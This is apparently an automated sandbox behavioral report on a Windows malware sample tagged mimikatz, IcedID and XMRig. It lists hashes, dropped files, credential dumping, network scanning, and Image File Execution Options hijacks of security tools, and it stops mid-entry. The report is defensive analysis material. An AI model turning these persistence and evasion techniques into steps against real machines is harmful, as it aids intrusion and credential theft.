Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 00:04
Behavioral task
behavioral1
Sample
2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe
-
Size
9.4MB
-
MD5
6c308ba5cd400432061e3712aa84362a
-
SHA1
b7f1cfc69959fbe96583ec8d6217d5a9d14d79a2
-
SHA256
5f2382ef7ca6f1d76b56b37f3ecc4d2bb41f379b7bb7bdeb64bc7beb18325cd2
-
SHA512
0e5c8f825bcda3db935a4f7917b5aff57fab9dd10a0feffecafc92c655c6079102f6c56a671c99615831f981ebccd452e94b71732b40bcd72373bb0823d95d0d
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4056 created 2084 4056 tmyfwky.exe 37 -
Xmrig family
-
Contacts a large (30232) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2696-176-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-181-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-198-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-213-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-224-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-233-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-246-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-495-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-496-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-499-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-754-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig behavioral2/memory/2696-755-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2128-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2128-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023cbb-6.dat mimikatz behavioral2/memory/3116-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4368-137-0x00007FF6023A0000-0x00007FF60248E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts tmyfwky.exe File opened for modification C:\Windows\system32\drivers\etc\hosts tmyfwky.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4652 netsh.exe 4516 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 3116 tmyfwky.exe 4056 tmyfwky.exe 1892 wpcap.exe 2276 bzbnzbyct.exe 4368 vfshost.exe 4780 cmzbnyytn.exe 1124 xohudmc.exe 2712 umueiy.exe 2696 lfbpkn.exe 4388 cmzbnyytn.exe 3668 cmzbnyytn.exe 2936 cmzbnyytn.exe 1608 cmzbnyytn.exe 1956 cmzbnyytn.exe 1928 cmzbnyytn.exe 536 cmzbnyytn.exe 3732 cmzbnyytn.exe 1616 cmzbnyytn.exe 1064 cmzbnyytn.exe 2768 tmyfwky.exe 3360 cmzbnyytn.exe 4428 cmzbnyytn.exe 244 cmzbnyytn.exe 2620 cmzbnyytn.exe 860 cmzbnyytn.exe 2668 cmzbnyytn.exe 2376 midctcinn.exe 4468 tmyfwky.exe -
Loads dropped DLL 12 IoCs
pid Process 1892 wpcap.exe 1892 wpcap.exe 1892 wpcap.exe 1892 wpcap.exe 1892 wpcap.exe 1892 wpcap.exe 1892 wpcap.exe 1892 wpcap.exe 1892 wpcap.exe 2276 bzbnzbyct.exe 2276 bzbnzbyct.exe 2276 bzbnzbyct.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tmyfwky.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tmyfwky.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F tmyfwky.exe -
resource yara_rule behavioral2/files/0x0007000000023d11-134.dat upx behavioral2/memory/4368-136-0x00007FF6023A0000-0x00007FF60248E000-memory.dmp upx behavioral2/memory/4368-137-0x00007FF6023A0000-0x00007FF60248E000-memory.dmp upx behavioral2/files/0x0007000000023d1c-140.dat upx behavioral2/memory/4780-141-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/4780-144-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/files/0x0007000000023d19-161.dat upx behavioral2/memory/2696-162-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/4388-169-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/3668-173-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2696-176-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/2936-179-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2696-181-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/1608-184-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/1956-188-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/1928-192-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/536-196-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2696-198-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/3732-201-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/1616-205-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2696-213-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/1064-214-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/3360-218-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/4428-222-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2696-224-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/244-227-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2620-230-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/860-232-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2696-233-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/2668-235-0x00007FF7BAF00000-0x00007FF7BAF5B000-memory.dmp upx behavioral2/memory/2696-246-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/2696-495-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/2696-496-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/2696-499-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/2696-754-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx behavioral2/memory/2696-755-0x00007FF627DE0000-0x00007FF627F00000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\itcctjlje\UnattendGC\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.xml tmyfwky.exe File created C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\mimidrv.sys tmyfwky.exe File opened for modification C:\Windows\itcctjlje\Corporate\log.txt cmd.exe File created C:\Windows\itcctjlje\UnattendGC\vimpcsvc.xml tmyfwky.exe File created C:\Windows\cbdnbivt\tmyfwky.exe 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe File created C:\Windows\itcctjlje\UnattendGC\schoedcl.xml tmyfwky.exe File created C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.exe tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\vfshost.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\Shellcode.ini tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture32.dll tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\ip.txt tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\zlib1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture64.dll tmyfwky.exe File opened for modification C:\Windows\itcctjlje\unptrtjvi\Result.txt midctcinn.exe File opened for modification C:\Windows\cbdnbivt\tmyfwky.exe 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe File created C:\Windows\itcctjlje\UnattendGC\specials\crli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.exe tmyfwky.exe File created C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ucl.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.exe tmyfwky.exe File created C:\Windows\ime\tmyfwky.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\scan.bat tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libeay32.dll tmyfwky.exe File created C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ssleay32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File opened for modification C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\xdvl-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\mimilib.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\posh-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trch-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trfo-2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\upbdrjv\swrpwe.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\exma-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libxml2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tibe-2.dll tmyfwky.exe File created C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\cnli-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\coli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tucl-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\spoolsrv.xml tmyfwky.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3732 sc.exe 2056 sc.exe 1616 sc.exe 1752 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmyfwky.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language umueiy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 